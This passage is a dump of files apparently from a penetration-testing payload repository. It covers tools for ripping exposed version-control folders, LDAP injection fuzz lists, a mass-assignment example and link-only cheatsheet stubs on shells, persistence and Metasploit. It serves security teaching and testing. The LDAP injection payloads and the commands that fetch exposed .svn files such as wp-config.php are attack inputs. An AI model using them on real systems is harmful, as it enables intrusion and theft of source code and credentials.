42 | * [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html)
43 | 


--------------------------------------------------------------------------------
/Insecure Source Code Management/Bazaar.md:
--------------------------------------------------------------------------------
 1 | # Bazaar
 2 | 
 3 | > Bazaar  (also known as bzr ) is a free, distributed version control system (DVCS) that helps you track project history over time and collaborate seamlessly with others. Developed by Canonical, Bazaar emphasizes ease of use, a flexible workflow, and rich features to cater to both individual developers and large teams.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 |     * [rip-bzr.pl](#rip-bzrpl)
 9 |     * [bzr_dumper](#bzr_dumper)
10 | * [References](#references)
11 | 
12 | ## Tools
13 | 
14 | ### rip-bzr.pl
15 | 
16 | * [kost/dvcs-ripper/rip-bzr.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl)
17 | 
18 |     ```powershell
19 |     docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
20 |     ```
21 | 
22 | ### bzr_dumper
23 | 
24 | * [SeahunOh/bzr_dumper](https://github.com/SeahunOh/bzr_dumper)
25 | 
26 | ```powershell
27 | python3 dumper.py -u "http://127.0.0.1:5000/" -o source
28 | Created a standalone tree (format: 2a)
29 | [!] Target : http://127.0.0.1:5000/
30 | [+] Start.
31 | [+] GET repository/pack-names
32 | [+] GET README
33 | [+] GET checkout/dirstate
34 | [+] GET checkout/views
35 | [+] GET branch/branch.conf
36 | [+] GET branch/format
37 | [+] GET branch/last-revision
38 | [+] GET branch/tag
39 | [+] GET b'154411f0f33adc3ff8cfb3d34209cbd1'
40 | [*] Finish
41 | ```
42 | 
43 | ```powershell
44 | bzr revert
45 |  N  application.py
46 |  N  database.py
47 |  N  static/
48 | ```
49 | 
50 | ## References
51 | 
52 | * [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380)
53 | 


--------------------------------------------------------------------------------
/Insecure Source Code Management/Mercurial.md:
--------------------------------------------------------------------------------
 1 | # Mercurial
 2 | 
 3 | > Mercurial  (also known as hg  from the chemical symbol for mercury) is a distributed version control system (DVCS) designed for efficiency and scalability. Developed by Matt Mackall and first released in 2005, Mercurial is known for its speed, simplicity, and ability to handle large codebases.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 |     * [rip-hg.pl](#rip-hgpl)
 9 | * [References](#references)
10 | 
11 | ## Tools
12 | 
13 | ### rip-hg.pl
14 | 
15 | * [kost/dvcs-ripper/master/rip-hg.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl) - Rip web accessible (distributed) version control systems: SVN/GIT/HG...
16 | 
17 |     ```powershell
18 |     docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
19 |     ```
20 | 
21 | ## References
22 | 
23 | * [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/)
24 | 


--------------------------------------------------------------------------------
/Insecure Source Code Management/README.md:
--------------------------------------------------------------------------------
 1 | # Insecure Source Code Management
 2 | 
 3 | > Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Methodology](#methodology)
 8 |     * [Bazaar](./Bazaar.md)
 9 |     * [Git](./Git.md)
10 |     * [Mercurial](./Mercurial.md)
11 |     * [Subversion](./Subversion.md)
12 | * [Labs](#labs)
13 | * [References](#references)
14 | 
15 | ## Methodology
16 | 
17 | Exposing the version control system folders on a web server can lead to severe security risks, including:
18 | 
19 | * **Source Code Leaks** : Attackers can download the entire source code repository, gaining access to the application's logic.
20 | * **Sensitive Information Exposure** : Embedded secrets, configuration files, and credentials might be present within the codebase.
21 | * **Commit History Exposure** : Attackers can view past changes, revealing sensitive information that might have been previously exposed and later mitigated.
22 | 
23 | The first step is to gather information about the target application. This can be done using various web reconnaissance tools and techniques.
24 | 
25 | * **Manual Inspection** : Check URLs manually by navigating to common SCM paths.
26 |     * Git: `http://target.com/.git/`
27 |     * SVN: `http://target.com/.svn/`
28 | 
29 | * **Automated Tools** : Refer to the page related to the specific technology.
30 | 
31 | Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules.
32 | 
33 | The NGINX rule below returns a `403 (Forbidden)` response instead of `404 (Not Found)` when hitting the `/.git` endpoint.
34 | 
35 | ```ps1
36 | location /.git {
37 |   deny all;
38 | }
39 | ```
40 | 
41 | For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (`http://target.com/.git/`), the data extraction can still be conducted when files can be read.
42 | 
43 | ## Labs
44 | 
45 | * [Root Me - Insecure Code Management](https://www.root-me.org/fr/Challenges/Web-Serveur/Insecure-Code-Management)
46 | 
47 | ## References
48 | 
49 | * [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
50 | 


--------------------------------------------------------------------------------
/Insecure Source Code Management/Subversion.md:
--------------------------------------------------------------------------------
 1 | # Subversion
 2 | 
 3 | > Subversion  (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Tools](#tools)
 8 | * [Methodology](#methodology)
 9 | * [References](#references)
10 | 
11 | ## Tools
12 | 
13 | * [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
14 | 
15 |     ```powershell
16 |     python svn-extractor.py --url "url with .svn available"
17 |     ```
18 | 
19 | ## Methodology
20 | 
21 | ```powershell
22 | curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
23 | ```
24 | 
25 | 1. Download the svn database from `http://server/path_to_vulnerable_site/.svn/wc.db`
26 | 
27 |     ```powershell
28 |     INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
29 |     ```
30 | 
31 | 2. Download interesting files
32 |     * remove `$sha1$` prefix
33 |     * add `.svn-base` postfix
34 |     * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
35 |     * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
36 | 
37 | ## References
38 | 
39 | * [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/)
40 | 


--------------------------------------------------------------------------------
/LDAP Injection/Intruder/LDAP_FUZZ.txt:
--------------------------------------------------------------------------------
 1 | *
 2 | *)(&
 3 | *))%00
 4 | *()|%26'
 5 | *()|&'
 6 | *(|(mail=*))
 7 | *(|(objectclass=*))
 8 | *)(uid=*))(|(uid=*
 9 | */*
10 | *|
11 | /
12 | //
13 | //*
14 | @*
15 | |
16 | admin*
17 | admin*)((|userpassword=*)
18 | admin*)((|userPassword=*)
19 | x' or name()='username' or 'x'='y
20 | !
21 | %21
22 | %26
23 | %28
24 | %29
25 | %2A%28%7C%28mail%3D%2A%29%29
26 | %2A%28%7C%28objectclass%3D%2A%29%29
27 | %2A%7C
28 | %7C
29 | &
30 | (
31 | )
32 | )(cn=))\x00
33 | *(|(mail=*))
34 | *(|(objectclass=*))
35 | */*
36 | *|
37 | /
38 | //
39 | //*
40 | @*
41 | x' or name()='username' or 'x'='y
42 | |
43 | *()|&'
44 | admin*
45 | admin*)((|userpassword=*)
46 | *)(uid=*))(|(uid=*
47 | 


--------------------------------------------------------------------------------
/LDAP Injection/Intruder/LDAP_FUZZ_SMALL.txt:
--------------------------------------------------------------------------------
 1 | *
 2 | *)(&
 3 | *))%00
 4 | )(cn=))\x00
 5 | *()|%26'
 6 | *()|&'
 7 | *(|(mail=*))
 8 | *(|(objectclass=*))
 9 | *)(uid=*))(|(uid=*
10 | */*
11 | *|
12 | /
13 | //
14 | //*
15 | @*
16 | |
17 | admin*
18 | admin*)((|userpassword=*)
19 | admin*)((|userPassword=*)
20 | x' or name()='username' or 'x'='ys


--------------------------------------------------------------------------------
/LDAP Injection/Intruder/LDAP_attributes.txt:
--------------------------------------------------------------------------------
 1 | c
 2 | cn
 3 | co
 4 | commonName
 5 | dc
 6 | facsimileTelephoneNumber
 7 | givenName
 8 | gn
 9 | homePhone
10 | id
11 | jpegPhoto
12 | l
13 | mail
14 | mobile
15 | name
16 | o
17 | objectClass
18 | ou
19 | owner
20 | pager
21 | password
22 | sn
23 | st
24 | surname
25 | uid
26 | username
27 | userPassword
28 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2019 Swissky
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Mass Assignment/README.md:
--------------------------------------------------------------------------------
 1 | # Mass Assignment
 2 | 
 3 | > A mass assignment attack is a security vulnerability that occurs when a web application automatically assigns user-supplied input values to properties or variables of a program object. This can become an issue if a user is able to modify attributes they should not have access to, like a user's permissions or an admin flag.
 4 | 
 5 | ## Summary
 6 | 
 7 | * [Methodology](#methodology)
 8 | * [Labs](#labs)
 9 | * [References](#references)
10 | 
11 | ## Methodology
12 | 
13 | Mass assignment vulnerabilities are most common in web applications that use Object-Relational Mapping (ORM) techniques or functions to map user input to object properties, where properties can be updated all at once instead of individually. Many popular web development frameworks such as Ruby on Rails, Django, and Laravel (PHP) offer this functionality.
14 | 
15 | For instance, consider a web application that uses an ORM and has a user object with the attributes `username`, `email`, `password`, and `isAdmin`. In a normal scenario, a user might be able to update their own username, email, and password through a form, which the server then assigns to the user object.
16 | 
17 | However, an attacker may attempt to add an `isAdmin` parameter to the incoming data like so:
18 | 
19 | ```json
20 | {
21 |     "username": "attacker",
22 |     "email": "attacker@email.com",
23 |     "password": "unsafe_password",
24 |     "isAdmin": true
25 | }
26 | ```
27 | 
28 | If the web application is not checking which parameters are allowed to be updated in this way, it might set the `isAdmin` attribute based on the user-supplied input, giving the attacker admin privileges
29 | 
30 | ## Labs
31 | 
32 | * [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964)
33 | * [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922)
34 | * [Root Me - API - Mass Assignment](https://www.root-me.org/en/Challenges/Web-Server/API-Mass-Assignment)
35 | 
36 | ## References
37 | 
38 | * [Hunting for Mass Assignment - Shivam Bathla - August 12, 2021](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
39 | * [Mass Assignment Cheat Sheet - OWASP - March 15, 2021](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)
40 | * [What is Mass Assignment? Attacks and Security Tips - Yoan MONTOYA - June 15, 2023](https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/)
41 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Bind Shell Cheatsheet.md:
--------------------------------------------------------------------------------
 1 | # Bind Shell
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/shell-bind](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/)
 4 | 
 5 | - [Perl](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#perl)
 6 | - [Python](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#python)
 7 | - [PHP](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#php)
 8 | - [Ruby](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ruby)
 9 | - [Netcat Traditional](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-traditional)
10 | - [Netcat OpenBsd](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-openbsd)
11 | - [Ncat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ncat)
12 | - [Socat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#socat)
13 | - [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#powershell)
14 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Cloud - AWS Pentest.md:
--------------------------------------------------------------------------------
 1 | # Cloud - AWS
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cloud/aws](https://github.com/swisskyrepo/InternalAllTheThings/)
 4 | 
 5 | - [Cloud - AWS](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/AWS%20Pentest/)
 6 | - [AWS - Access Token & Secrets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/)
 7 | - [AWS - Service - Cognito](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-cognito/)
 8 | - [AWS - Service - DynamoDB](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-dynamodb/)
 9 | - [AWS - Service - EC2](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ec2/)
10 | - [AWS - Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-enumeration/)
11 | - [AWS - Identity & Access Management](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-iam/)
12 | - [AWS - IOC & Detections](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ioc-detection/)
13 | - [AWS - Service - Lambda](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-lambda/)
14 | - [AWS - Metadata SSRF](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-metadata/)
15 | - [AWS - Service - S3 Buckets](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-s3-bucket/)
16 | - [AWS - Service - SSM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ssm/)
17 | - [AWS - Training](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-training/)
18 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Cloud - Azure Pentest.md:
--------------------------------------------------------------------------------
 1 | # Cloud - Azure
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cloud/azure](https://github.com/swisskyrepo/InternalAllTheThings/)
 4 | 
 5 | - [Azure AD Connect](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-ad-connect/)
 6 | - [Azure AD Enumerate](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-enumeration/)
 7 | - [Azure AD IAM](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-devices-users-sp/)
 8 | - [Azure AD Phishing](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/)
 9 | - [Azure AD Tokens](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-access-and-token/)
10 | - [Azure Persistence](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-persistence/)
11 | - [Azure Requirements](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-requirements/)
12 | - [Azure Services](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-services/)
13 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Container - Docker Pentest.md:
--------------------------------------------------------------------------------
 1 | # Container - Docker
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/containers/docker](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/)
 4 | 
 5 | - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#tools)
 6 | - [Mounted Docker Socket](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#mounted-docker-socket)
 7 | - [Open Docker API Port](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#open-docker-api-port)
 8 | - [Insecure Docker Registry](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#insecure-docker-registry)
 9 | - [Exploit privileged container abusing the Linux cgroup v1](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#exploit-privileged-container-abusing-the-linux-cgroup-v1)
10 |     - [Abusing CAP_SYS_ADMIN capability](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-capsysadmin-capability)
11 |     - [Abusing coredumps and core_pattern](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#abusing-coredumps-and-corepattern)
12 | - [Breaking out of Docker via runC](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-docker-via-runc)
13 | - [Breaking out of containers using a device file](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#breaking-out-of-containers-using-a-device-file)
14 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/#references)
15 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Container - Kubernetes Pentest.md:
--------------------------------------------------------------------------------
 1 | # Container - Kubernetes
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/containers/kubernetes/](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/)
 4 | 
 5 | - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#tools)
 6 | - [Exploits](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#exploits)
 7 |     - [Accessible kubelet on 10250/TCP](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#accessible-kubelet-on-10250tcp)
 8 |     - [Obtaining Service Account Token](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#obtaining-service-account-token)
 9 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/#references)
10 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Escape Breakout.md:
--------------------------------------------------------------------------------
 1 | # Application Escape and Breakout
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/escape-breakout](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/)
 4 | 
 5 | - [Gaining a command shell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#gaining-a-command-shell)
 6 | - [Sticky Keys](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#sticky-keys)
 7 | - [Dialog Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#dialog-boxes)
 8 |     - [Creating new files](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#creating-new-files)
 9 |     - [Open a new Windows Explorer instance](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#open-a-new-windows-explorer-instance)
10 |     - [Exploring Context Menus](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#exploring-context-menus)
11 |     - [Save as](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#save-as)
12 |     - [Input Boxes](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#input-boxes)
13 |     - [Bypass file restrictions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#bypass-file-restrictions)
14 | - [Internet Explorer](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#internet-explorer)
15 | - [Shell URI Handlers](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#shell-uri-handlers)
16 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#references)
17 | 


--------------------------------------------------------------------------------
/Methodology and Resources/HTML Smuggling.md:
--------------------------------------------------------------------------------
1 | # HTML Smuggling
2 | 
3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/html-smuggling](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/)
4 | 
5 | - [Description](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#description)
6 | - [Executable Storage](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/#executable-storage)
7 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Hash Cracking.md:
--------------------------------------------------------------------------------
 1 | # Hash Cracking
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/hash-cracking](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/)
 4 | 
 5 | - [Hashcat](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat)
 6 |     - [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)
 7 |     - [Hashcat Install](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#hashcat-install)
 8 |     - [Mask attack](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#mask-attack)
 9 |     - [Dictionary](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#dictionary)
10 | - [John](https://github.com/openwall/john)
11 |     - [Usage](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#john-usage)
12 | - [Rainbow tables](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#rainbow-tables)
13 | - [Tips and Tricks](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#tips-and-tricks)
14 | - [Online Cracking Resources](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#online-cracking-resources)
15 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/#references)
16 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Initial Access.md:
--------------------------------------------------------------------------------
 1 | # Initial Access
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/)
 4 | 
 5 | - [Complex Chains](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#complex-chains)
 6 | - [Container](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#container)
 7 | - [Payload](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#payload)
 8 |     - [Binary Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#binary-files)
 9 |     - [Code Execution Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-execution-files)
10 |     - [Embedded Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#embedded-files)
11 | - [Code Signing](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/#code-signing)
12 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Linux - Evasion.md:
--------------------------------------------------------------------------------
1 | # Linux - Evasion
2 | 
3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/)
4 | 
5 | - [File names](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#file-names)
6 | - [Command history](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#command-history)
7 | - [Hiding text](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#hiding-text)
8 | - [Timestomping](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/#timestomping)
9 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Linux - Persistence.md:
--------------------------------------------------------------------------------
 1 | # Linux - Persistence
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/)
 4 | 
 5 | - [Basic reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#basic-reverse-shell)
 6 | - [Add a root user](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#add-a-root-user)
 7 | - [Suid Binary](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#suid-binary)
 8 | - [Crontab - Reverse shell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#crontab---reverse-shell)
 9 | - [Backdooring a user's bash_rc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-users-bash_rc)
10 | - [Backdooring a startup service](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-startup-service)
11 | - [Backdooring a user startup file](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-user-startup-file)
12 | - [Backdooring Message of the Day](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-message-of-the-day)
13 | - [Backdooring a driver](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-a-driver)
14 | - [Backdooring the APT](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-apt)
15 | - [Backdooring the SSH](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-the-ssh)
16 | - [Backdooring Git](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#backdooring-git)
17 | - [Additional Linux Persistence Options](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#additional-persistence-options)
18 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/#references)
19 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Metasploit - Cheatsheet.md:
--------------------------------------------------------------------------------
 1 | # Metasploit
 2 | 
 3 | :warning: Content of this page has been moved to [InternalAllTheThings/command-control/metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/)
 4 | 
 5 | - [Installation](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#installation)
 6 | - [Sessions](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#sessions)
 7 | - [Background handler](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#background-handler)
 8 | - [Meterpreter - Basic](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter---basic)
 9 |     - [Generate a meterpreter](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#generate-a-meterpreter)
10 |     - [Meterpreter Webdelivery](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#meterpreter-webdelivery)
11 |     - [Get System](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#get-system)
12 |     - [Persistence Startup](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#persistence-startup)
13 |     - [Network Monitoring](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#network-monitoring)
14 |     - [Portforward](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#portforward)
15 |     - [Upload / Download](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#upload---download)
16 |     - [Execute from Memory](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#execute-from-memory)
17 |     - [Mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#mimikatz)
18 |     - [Pass the Hash - PSExec](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#pass-the-hash---psexec)
19 |     - [Use SOCKS Proxy](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#use-socks-proxy)
20 | - [Scripting Metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#scripting-metasploit)
21 | - [Multiple transports](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#multiple-transports)
22 | - [Best of - Exploits](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#best-of---exploits)
23 | - [References](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#references)
24 | 


--------------------------------------------------------------------------------
/Methodology and Resources/Methodology and enumeration.md:
--------------------------------------------------------------------------------
 1 | # Bug Hunting Methodology and Enumeration
 2 | 
